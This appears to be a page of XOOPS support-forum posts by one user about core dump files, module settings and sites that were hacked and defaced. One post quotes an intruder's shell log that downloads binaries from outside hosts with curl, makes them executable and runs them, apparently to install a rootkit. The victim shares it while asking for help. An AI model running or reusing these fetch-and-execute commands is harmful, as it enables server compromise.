61
Ace_Armstrong
Re: Strange "core.####" files in newbb directory

Quote:

DonXoop wrote:
Those are likely core dump files on *nix machines. Usually means that something crashed (Apache?) and left the core file for analysis. Nice how the machine didn't die though eh?

Suggest looking at the Apache and system logs to see what is happening.


So no worries in nuking them, then. Superb.

Muchas gracias!



62
Ace_Armstrong
Re: Strange "core.####" files in newbb directory

Anyone know what these files are? They are taking up considerable space on my server.



63
Ace_Armstrong
Strange "core.####" files in newbb directory

I've noticed that since updating to NewBB 2 that I have a plethora (that's right: plethora) of files named "core.####" (with the #### replaced by a numeric value). Most of these files are very small, but some are several megs. What are these files, and would it do any harm to delete them?



64
Ace_Armstrong
Re: Vulnerability in links?

Excellent. Thanks!



65
Ace_Armstrong
Re: Vulnerability in links?

Quote:

jdseymour wrote:
Not to my knowledge, can you give a little more detail as to the type of attack that took place? and what the results where?


I'm not 100% sure what types of attacks they were. In both cases, the hacker was able to gain access to the site sufficiently to wipe out the existing files and attempt to install a rootkit.

Here's a partial transcript of what they tried to do:

Quote:

uname -a
ls
wget
ls
curl -o elf xuxett.cjb.net/app/elf
ls
chmod +x elf
./elf
./elf -f
ls
curl -o kmod xuxett.cjb.net/app/kmod
chmod +x kmod
./kmod
rm -fr kmod
rm -fr elf
curl -o brk2 xuxett.cjb.net/app/brk2
chmod +x brk2
./brk2
rm -fr brk2
curl -o brk xuxett.cjb.net/app/brk
chmod +x brk
./brk
rm -fr brk
curl -o ptrace http://207.44.214.72/app/ptrace
chmod +x ptrace
./ptrace
curl -o uselib24 xuxett.cjb.net/app/uselib24
chmod +x uselib24
./uselib24
curl -o pwned xuxett.cjb.net/app/pwned
chmod +x pwned
./pwned
./pwned
./pwned
./elf -f
ls
rm -fr TTdummyfile
rm -fr TTeatfile
rm -fr TTsharefile
ls
rm -fr TTeatfiles
curl -o elf xuxett.cjb.net/app/elf
chmod +x elf
./elf
./elf -f
./elf
ls
curl -o ptrace24 xuxett.cjb.net/app/ptrace24
chmod +x ptrace24
./ptrace24
exec ./ptrace24 22899



66
Ace_Armstrong
Vulnerability in links?

I've had a couple of XOOPS sites get hacked in recent days, and I recently noticed that both of them had received a very high level of activity in the Links module (the stock module that comes as part of XOOPS) in the days and hours before the hacks.

Is there a known vulnerability in the Links module? If so, any way to tighten it up?

Thanks!



67
Ace_Armstrong
Re: how to show all the topics in forum irrespective of days passed.

Quote:

ackbarr wrote:
in newbb v2 /modules/newbb/viewforum.php change:
$sortsince = !empty($_GET['sortsince']) ? intval($_GET['sortsince']) : 100;

to:
$sortsince = !empty($_GET['sortsince']) ? intval($_GET['sortsince']) : [color=008000][b]1000[/b][/color];


I wanted to do the same thing, but I'm not finding that line in viewforum.php

Has it changed in version 2.02?



68
Ace_Armstrong
Re: Sites being defaced...anyone else seeing a trend here?

Quote:

Burnzy wrote:
omg im cracking up here. They hacked ur site and left there email. Thats halarious. wooo


Well, they either aren't very good (read: ScriptKiddies) or don't intend to be extremely malicious, because all they did was overwrite the old index.html file. I just uploaded the original and all was well again. What pisses me off is that they got in at all.

For the previous question, this is shared hosting (as I understand the term). I don't know if they upgraded their PHP or not recently. I'll have to find out.



69
Ace_Armstrong
Sites being defaced...anyone else seeing a trend here?

In the last month, I have had two of the sites I've designed for clients get hacked into and defaced. Both were XOOPS sites, and they are the only sites I've ever had someone manage to hack into.

Has anyone else had this problem? If so, did you ever figure out how they were getting in, or have any ideas on how to prevent this?



70
Ace_Armstrong
Re: Some NewBB 2.0 questions

Quote:

m0nty wrote:
the internal server error could be due to max memory / max post size set in php.ini

ideally this needs to be a minimum of 16m as the default 8m is a little small for a lot of new scripts.

it could also be due to the time out aswell, but those settings are a server setting so u may need to contact ur host..

of course, it may not be related to that, but it maybe worth checking.. a simple phpinfo() script should give u enuff info to check those with..


I'm pretty sure that's not it. There are much longer threads with much longer posts that all seem fine. My guess is that maybe something got corrupted, but I haven't a clue as to what.




TopTop
« 1 ... 4 5 6 (7) 8 9 10 ... 22 »



Login

Who's Online

50 user(s) are online (19 user(s) are browsing Support Forums)


Members: 0


Guests: 50


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Aug 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits